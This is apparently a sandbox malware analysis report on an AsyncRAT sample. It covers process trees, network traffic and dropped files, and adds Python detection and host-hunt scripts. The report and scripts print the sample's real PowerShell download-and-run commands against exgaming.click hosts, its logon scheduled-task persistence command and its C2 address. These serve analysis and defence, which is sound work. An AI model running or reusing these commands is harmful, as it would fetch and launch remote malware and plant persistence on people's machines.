Malware Analysis Report

2025-01-02 12:11

Sample ID 240417-nqk9dadd93
Target a7d63348cfe9b0dc9d3aaec28c76c8f0.exe
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
Tags
rat default asyncrat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54

Threat Level: Known bad

The file a7d63348cfe9b0dc9d3aaec28c76c8f0.exe was found to be: Known bad.

Observed chain (from the behavioral runs below): the sample copies itself to C:\Users\Admin\AppData\Roaming\system.exe, registers a logon-triggered scheduled task named "system" at the highest run level to relaunch that copy, stages the relaunch through a temporary .bat that runs "timeout 3" first, tries to download two further payloads from http://xcu.exgaming.click and http://xcu5.exgaming.click into %Temp% under the look-alike names ExpIorer.exe and ExplIorer.exe (capital I in place of l), resolves pastebin.com, and opens repeated TCP connections to 51.254.53.24:4449.

Malicious Activity Summary

rat default asyncrat

AsyncRat

Asyncrat family

Async RAT payload

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-17 11:36

Signatures

Async RAT payload

rat
(no indicator details recorded)

Asyncrat family

asyncrat

Unsigned PE

(no indicator details recorded)

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-17 11:36

Reported

2024-04-17 11:38

Platform

win7-20240221-en

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
(no indicator details recorded)

Executes dropped EXE

Process: C:\Users\Admin\AppData\Roaming\system.exe

Legitimate hosting services abused for malware hosting/C2

Indicator: pastebin.com (two lookups)

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Process: C:\Windows\system32\schtasks.exe

Delays execution with timeout.exe

evasion
Process: C:\Windows\system32\timeout.exe

Suspicious behavior: EnumeratesProcesses

Process (event count; the 64 identical rows are collapsed):
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (6)
C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe (6)
C:\Users\Admin\AppData\Roaming\system.exe (52)

Suspicious use of SetWindowsHookEx

Process: C:\Users\Admin\AppData\Roaming\system.exe

Suspicious use of WriteProcessMemory

Each parent wrote to each child's memory three times at process creation; the 45 logged rows are collapsed into the tree below (PID, image). The parent/child pairs are the process tree of the run.

2184 C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe
  2588 C:\Windows\System32\cmd.exe
    2932 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    2456 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    1892 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    1628 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  2624 C:\Windows\System32\cmd.exe
    2436 C:\Windows\system32\schtasks.exe
  2816 C:\Windows\system32\cmd.exe
    2552 C:\Windows\system32\timeout.exe
    1908 C:\Users\Admin\AppData\Roaming\system.exe
      1216 C:\Windows\System32\cmd.exe
        2656 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        2352 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        2896 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        3032 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe

"C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8D80.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Users\Admin\AppData\Roaming\system.exe

"C:\Users\Admin\AppData\Roaming\system.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
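The process list above contains the three behaviours worth a detection rule: a PowerShell WebClient download cradle writing into %Temp% under names that imitate explorer.exe with a capital I in place of l, a logon-triggered scheduled task whose action lives in the user's Roaming directory, and a cmd.exe running a Temp .bat that sleeps with timeout.exe before starting the dropped copy. The script below is an added example, not code from the sandbox or from the sample: it encodes those four checks and runs them over constructed process-creation records (pid, ppid, image, cmdline, an assumed shape standing in for Sysmon Event ID 1 or EDR telemetry). The command lines are copied from the list above; the PIDs follow the WriteProcessMemory tree where that is unambiguous, and the PIDs assigned to the individual PowerShell children are assumptions, since the report lists their command lines without PIDs.

```python
"""Detection logic for the execution chain recorded above, run over
constructed process-creation records.

Added example, not code from the sandbox or from the sample.  The record
shape (pid, ppid, image, cmdline) is an assumption standing in for Sysmon
Event ID 1 / EDR process telemetry.  Command lines are copied from the
behavioral1 Processes list; PIDs follow the WriteProcessMemory table where
the mapping is unambiguous, and the PIDs of the individual PowerShell
children are assumed because the report lists their command lines without
PIDs.
"""
import re

# Characters attackers swap for lookalikes in file names (I, 1 and | for l; 0 for o).
CONFUSABLES = str.maketrans("I1|0", "lllo")
SYSTEM_BINARIES = {"explorer.exe", "svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe"}

USER_WRITABLE = re.compile(r"(?i)(%temp%|%appdata%|\\appdata\\|\\temp\\|\\programdata\\)")
DOWNLOAD_CRADLE = re.compile(r"(?i)\.downloadfile\(\s*'(?P<url>[^']+)'\s*,\s*'(?P<dst>[^']+)'")
EXE_PATH = re.compile(r"[A-Za-z%][^'\"\s]*\.exe", re.I)
SCHTASKS_ONLOGON = re.compile(r"(?i)schtasks\s+/create\b.*?/sc\s+onlogon\b.*?/tr\s+'?\"?(?P<target>[^'\"]+)")
TEMP_BAT = re.compile(r"(?i)\\temp\\[^'\"]*\.bat")


def edit_distance(a, b):
    """Levenshtein distance, for short strings such as file names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def masquerade_target(path):
    """Return the system binary a file name imitates, or None.

    'ExpIorer.exe' folds to 'explorer.exe' (capital I standing in for l);
    'ExplIorer.exe' folds to 'expllorer.exe', one edit away.  A file that
    really is named explorer.exe is not flagged here; that is a path check.
    """
    base = path.replace("/", "\\").rsplit("\\", 1)[-1]
    if base.lower() in SYSTEM_BINARIES:
        return None
    folded = base.translate(CONFUSABLES).lower()
    for real in sorted(SYSTEM_BINARIES):
        if edit_distance(folded, real) <= 1:
            return real
    return None


def detect(events):
    """Apply the four rules to a list of process-creation records.

    Returns a sorted list of (pid, rule, detail) tuples; identical hits from
    repeated command-line fragments are collapsed.
    """
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)
    found = set()

    for e in events:
        pid, cmd = e["pid"], e["cmdline"]

        # Rule 1: WebClient.DownloadFile writing into a user-writable directory.
        for m in DOWNLOAD_CRADLE.finditer(cmd):
            if USER_WRITABLE.search(m.group("dst")):
                found.add((pid, "download_cradle_user_path", m.group("dst")))

        # Rule 2: any executable on the command line whose name imitates a system binary.
        for p in EXE_PATH.findall(cmd):
            real = masquerade_target(p)
            if real:
                found.add((pid, "homoglyph_masquerade", f"{p} ~ {real}"))

        # Rule 3: logon-triggered scheduled task whose action lives in a user-writable directory.
        m = SCHTASKS_ONLOGON.search(cmd)
        if m and USER_WRITABLE.search(m.group("target")):
            detail = m.group("target") + (" (highest)" if "/rl highest" in cmd.lower() else "")
            found.add((pid, "onlogon_task_user_path", detail))

        # Rule 4: cmd.exe running a .bat from Temp that sleeps (timeout.exe)
        # and then starts an executable from a user-writable directory.
        if e["image"].lower().endswith("\\cmd.exe") and TEMP_BAT.search(cmd):
            kids = children.get(pid, [])
            slept = any(k["image"].lower().endswith("\\timeout.exe") for k in kids)
            dropped = [k["image"] for k in kids if USER_WRITABLE.search(k["image"])]
            if slept and dropped:
                found.add((pid, "bat_delay_then_dropped_exe", dropped[0]))

    return sorted(found)


def ev(pid, ppid, image, cmdline):
    return {"pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe"
DROPPED = r"C:\Users\Admin\AppData\Roaming\system.exe"
CRADLE = r'''"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit'''
TASK = (r'''schtasks /create /f /sc onlogon /rl highest /tn "system" '''
        r'''/tr '"C:\Users\Admin\AppData\Roaming\system.exe"' ''').rstrip()

# Constructed records; PIDs of the PowerShell children are assumed (see docstring).
EVENTS = [
    ev(2184, 1000, SAMPLE, f'"{SAMPLE}"'),
    ev(2588, 2184, r"C:\Windows\System32\cmd.exe", CRADLE),
    ev(2932, 2588, PS, r"powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')"),
    ev(1892, 2588, PS, r"powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'"),
    ev(2624, 2184, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ' + TASK + " & exit"),
    ev(2436, 2624, r"C:\Windows\system32\schtasks.exe", TASK),
    ev(2816, 2184, r"C:\Windows\system32\cmd.exe", r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp8D80.tmp.bat""'),
    ev(2552, 2816, r"C:\Windows\system32\timeout.exe", "timeout 3"),
    ev(1908, 2816, DROPPED, f'"{DROPPED}"'),
]

if __name__ == "__main__":
    for pid, rule, detail in detect(EVENTS):
        print(f"{pid:>5}  {rule:<28} {detail}")
```

Rule 4 is the one that needs parent/child context rather than a single command line, which is why the records carry ppid: on its own, `cmd /c tmp8D80.tmp.bat` is unremarkable. The homoglyph check deliberately folds characters before comparing and then tolerates one edit, so both spellings seen in this run (ExpIorer.exe and ExplIorer.exe) resolve to explorer.exe, while a genuine explorer.exe is left to a path-based rule.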

Network

Country Destination Domain Proto
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 xcu5.exgaming.click udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
FR 51.254.53.24:4449 (no domain; direct-to-IP, 5 connections) tcp

Both exgaming.click names were looked up, but no connection to either host follows and neither ExpIorer.exe nor ExplIorer.exe appears in the Files list below, so the download cradle delivered nothing during this run. The only traffic not explained by the cradle or the pastebin.com lookup is the repeated raw TCP session to 51.254.53.24:4449, which is the endpoint to treat as the C2 channel.

Files

memory/2184-0-0x0000000001030000-0x0000000001048000-memory.dmp

memory/2184-1-0x000007FEF5720000-0x000007FEF610C000-memory.dmp

memory/2184-7-0x0000000000CA0000-0x0000000000D20000-memory.dmp

memory/2932-8-0x00000000029F0000-0x0000000002A70000-memory.dmp

memory/2932-9-0x000000001B140000-0x000000001B422000-memory.dmp

memory/2932-10-0x0000000002700000-0x0000000002708000-memory.dmp

memory/2932-11-0x000007FEED770000-0x000007FEEE10D000-memory.dmp

memory/2932-12-0x00000000029F0000-0x0000000002A70000-memory.dmp

memory/2932-13-0x000007FEED770000-0x000007FEEE10D000-memory.dmp

memory/2932-14-0x00000000029F0000-0x0000000002A70000-memory.dmp

memory/2932-15-0x00000000029F0000-0x0000000002A70000-memory.dmp

memory/2184-16-0x0000000077200000-0x00000000773A9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp8D80.tmp.bat

MD5 260f80c17b07c7f932ab0fb8b35fef12
SHA1 8edad7745030341383628525fe93a0db2bcafb3e
SHA256 76b926550be74146c6ea147230c3537f110350b5bfa97c44967a62e663c030cf
SHA512 8ee8c14e807f54e4abf3daf1ff6d5d47cbbc6c325195630d48690d87f555821b248464ae7494075762302b73137bcab4fb3ec15f2f6967ccd6a11988198cb212

memory/2184-26-0x000007FEF5720000-0x000007FEF610C000-memory.dmp

memory/2184-27-0x0000000077200000-0x00000000773A9000-memory.dmp

memory/2932-28-0x000007FEED770000-0x000007FEEE10D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 dd359118062db8379da3d8bd9118b9de
SHA1 149fd1ee58fca63c4d6a0ae0922c0aecb3d42a91
SHA256 4a4bbf16c5e38efe52ba8c0ae14121edf43635850f52a96460d392a3b12e2507
SHA512 0afc7f24ce18b1501ef548c5e61edae81c0b09718c78da439f7ba9b57f64131a7152b3be4dfc1ba1c10bf6f49b0978bab9f0c1f7351a911ea5e19db76926f58e

memory/2456-35-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2456-34-0x000000001B200000-0x000000001B4E2000-memory.dmp

memory/2456-36-0x0000000002320000-0x0000000002328000-memory.dmp

memory/2456-37-0x0000000002620000-0x00000000026A0000-memory.dmp

memory/2456-39-0x0000000002620000-0x00000000026A0000-memory.dmp

memory/2456-38-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2456-40-0x0000000002620000-0x00000000026A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\system.exe

MD5 a7d63348cfe9b0dc9d3aaec28c76c8f0
SHA1 1b993f554960286e90cfd7cedf4c457e1c46ff80
SHA256 16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
SHA512 3910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010
(identical hashes to the submitted sample: the persistence copy in Roaming is a byte-for-byte self-copy, so a single file-hash IOC covers both)

memory/1908-44-0x0000000000320000-0x0000000000338000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

memory/1908-46-0x000007FEEE1B0000-0x000007FEEEB9C000-memory.dmp

memory/1908-47-0x000000001ADB0000-0x000000001AE30000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
(zero-length: these are the hashes of empty input; the entry records that the srvsvc named pipe was opened, not a dropped file)

memory/2656-55-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2656-54-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2656-56-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2656-58-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2656-59-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2656-57-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2456-60-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/1908-61-0x0000000077200000-0x00000000773A9000-memory.dmp

memory/1892-67-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/1892-68-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/1892-69-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/1892-71-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/1892-72-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/1892-70-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/1892-73-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2656-74-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2352-86-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

memory/2352-88-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

memory/2352-89-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/2352-87-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/1628-91-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

memory/1628-93-0x0000000002650000-0x00000000026D0000-memory.dmp

memory/2352-95-0x00000000026A0000-0x0000000002720000-memory.dmp

memory/1628-94-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

memory/1908-96-0x000007FEEE1B0000-0x000007FEEEB9C000-memory.dmp

memory/1628-92-0x0000000002650000-0x00000000026D0000-memory.dmp

memory/1628-90-0x000000000265B000-0x00000000026C2000-memory.dmp

memory/2352-97-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

memory/2896-104-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/2896-103-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2896-105-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/1908-107-0x000000001ADB0000-0x000000001AE30000-memory.dmp

memory/2896-109-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/2896-108-0x0000000002970000-0x00000000029F0000-memory.dmp

memory/2896-106-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/2896-110-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

memory/3032-116-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

memory/3032-117-0x0000000002420000-0x00000000024A0000-memory.dmp

memory/3032-118-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp
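The Files list above fixes the on-host artifacts of this run: the self-copy at %APPDATA%\system.exe (same SHA256 as the sample), %APPDATA%\MyData\DataLogs.conf, and the logon task "system" created by schtasks. The script below is an added hunt example, not part of the report, that looks for the task the way a responder would on a host: it parses the CSV printed by `schtasks /query /fo CSV /v`, flags any task whose action runs from a user-writable directory, and matches file contents against the report's SHA256 values. The column names it reads (TaskName, Task To Run, Run As User, Schedule Type) are those of an English Windows build; localized builds rename them. SAMPLE_CSV is constructed, keeps only the columns the code reads (the real output has many more, which DictReader ignores), and includes the repeated header line that schtasks emits per task folder.

```python
"""Host hunt for the persistence recorded above: the logon-triggered task
named "system" that runs the self-copy in %APPDATA%, and the dropped files.

Added example, not part of the report.  It parses the CSV printed by
`schtasks /query /fo CSV /v`; the column names used (TaskName, Task To Run,
Run As User, Schedule Type) are those of an English Windows build, and
localized builds rename them.  SAMPLE_CSV is constructed, not captured
output, and keeps only the columns the code reads.
"""
import csv
import hashlib
import io
import re
import subprocess

# SHA256 values from the Files section of this report.
IOC_SHA256 = {
    "16686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54": r"%APPDATA%\system.exe (self-copy of the sample)",
    "c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761": r"%APPDATA%\MyData\DataLogs.conf",
}

# Directories a standard user can write to; a task action living here is
# the thing to look at, whatever the task is called.
USER_WRITABLE = re.compile(
    r"(?i)\\users\\[^\\]+\\(appdata|downloads|desktop|documents)\\"
    r"|\\programdata\\|%(appdata|localappdata|temp|userprofile)%"
)
LOOKALIKE_NAME = re.compile(r"(?i)\\(system|svchost|explorer|winlogon|csrss)\.exe\b")


def suspicious_tasks(csv_text):
    """Rows of `schtasks /query /fo CSV /v` whose action runs from a user-writable path.

    Returns (TaskName, Task To Run, Run As User, Schedule Type, reasons).
    """
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row.get("TaskName") == "TaskName":
            continue  # schtasks repeats the header line for each task folder
        action = (row.get("Task To Run") or "").strip()
        if not USER_WRITABLE.search(action):
            continue
        reasons = ["action in user-writable directory"]
        if "logon" in (row.get("Schedule Type") or "").lower():
            reasons.append("runs at logon")
        if LOOKALIKE_NAME.search(action):
            reasons.append("name imitates a Windows component")
        hits.append((row["TaskName"], action, row.get("Run As User", ""),
                     row.get("Schedule Type", ""), reasons))
    return hits


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def match_ioc(data):
    """Report artifact whose SHA256 equals that of `data`, or None."""
    return IOC_SHA256.get(sha256_hex(data))


def live_tasks():
    """Query the local Task Scheduler (Windows only) and return the suspicious rows."""
    out = subprocess.run(["schtasks", "/query", "/fo", "CSV", "/v"],
                         capture_output=True, text=True, check=True).stdout
    return suspicious_tasks(out)


# Constructed sample: one stock Windows task and one row shaped like the task
# this sample creates with: schtasks /create /f /sc onlogon /rl highest /tn "system" ...
SAMPLE_CSV = r'''"HostName","TaskName","Task To Run","Run As User","Schedule Type"
"WIN7-PC","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c","SYSTEM","Weekly"
"HostName","TaskName","Task To Run","Run As User","Schedule Type"
"WIN7-PC","\system","C:\Users\Admin\AppData\Roaming\system.exe","Admin","At logon time"
'''

if __name__ == "__main__":
    for name, action, user, sched, reasons in suspicious_tasks(SAMPLE_CSV):
        print(f"{name}: {action} [{user}, {sched}] -> {', '.join(reasons)}")
```

The task name is deliberately not the primary signal: "system" is the name this sample chose, but the durable check is where the action points and whether it fires at logon. For the dropped files, read %APPDATA%\system.exe and %APPDATA%\MyData\DataLogs.conf as bytes and pass them to match_ioc; because system.exe is a self-copy, one SHA256 also identifies the original dropper wherever it was first written.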

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-17 11:36

Reported

2024-04-17 11:38

Platform

win10v2004-20240226-en

Max time kernel

151s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
(no indicator details recorded)

Checks computer location settings

Key value queried: \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation
Processes: C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe and C:\Users\Admin\AppData\Roaming\system.exe (the same query is repeated by the persistence copy)

Executes dropped EXE

Process: C:\Users\Admin\AppData\Roaming\system.exe

Legitimate hosting services abused for malware hosting/C2

Indicator: pastebin.com (two lookups)

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Process: C:\Windows\system32\schtasks.exe

Delays execution with timeout.exe

evasion
Process: C:\Windows\system32\timeout.exe

Suspicious behavior: EnumeratesProcesses

Process (event count; the 64 identical rows are collapsed):
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (3)
C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe (61)

Suspicious use of SetWindowsHookEx

Process: C:\Users\Admin\AppData\Roaming\system.exe

Suspicious use of WriteProcessMemory

Each parent wrote to each child's memory twice at process creation; the 30 logged rows are collapsed into the tree below (PID, image). The parent/child pairs are the process tree of the run and match the Windows 7 run above, with different PIDs.

4620 C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe
  5004 C:\Windows\System32\cmd.exe
    4280 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    5412 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    644 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    5076 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  5452 C:\Windows\System32\cmd.exe
    4872 C:\Windows\system32\schtasks.exe
  5776 C:\Windows\system32\cmd.exe
    4476 C:\Windows\system32\timeout.exe
    4956 C:\Users\Admin\AppData\Roaming\system.exe
      5468 C:\Windows\System32\cmd.exe
        4020 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        4520 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        5000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        3604 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe

"C:\Users\Admin\AppData\Local\Temp\a7d63348cfe9b0dc9d3aaec28c76c8f0.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1CE9.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Users\Admin\AppData\Roaming\system.exe

"C:\Users\Admin\AppData\Roaming\system.exe"

C:\Windows\System32\cmd.exe

